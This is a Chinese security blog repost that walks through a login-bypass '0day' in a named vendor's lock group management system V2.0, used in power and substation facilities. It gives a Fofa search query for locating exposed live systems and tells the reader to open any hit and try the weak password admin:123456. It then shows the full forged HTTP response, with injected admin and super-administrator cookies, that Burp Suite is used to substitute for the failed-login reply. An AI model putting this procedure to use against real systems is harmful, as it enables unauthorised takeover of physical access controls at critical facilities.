锁群管理系统0day复现

admin 2022年12月1日15:19:17评论105 views字数 1005阅读3分21秒阅读模式

一:漏洞介绍

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞详情

在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。经过测试发现,可以通杀2.0版本。

二:漏洞利用

步骤一:使用Fofa搜索以下语句并随便打开一个连接地址...尝试若口令登录(admin:123456
title=="锁群管理系统 V2.0"

锁群管理系统0day复现

锁群管理系统0day复现

锁群管理系统0day复现

步骤三:本人使用火狐浏览器在使用BurpSuite工具前先添加插件

锁群管理系统0day复现

锁群管理系统0day复现

锁群管理系统0day复现

步骤四:先开启插件再登录页面输入用户名admin并随便输入密码,开启代理抓包修改返回数据包如下...

锁群管理系统0day复现


修改之前:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 09:29:15 GMTConnection: closeContent-Length: 30
用户名或密码不正确!
修改之后:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=admin; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 09:29:15 GMTConnection: closeContent-Length: 30

锁群管理系统0day复现

步骤四:放包之后就可以登录到后台界面中...此时操作关闭代理

锁群管理系统0day复现


原文始发于微信公众号(Hack All):锁群管理系统0day复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月1日15:19:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锁群管理系统0day复现https://cn-sec.com/archives/1437246.html

发表评论

匿名网友 填写信息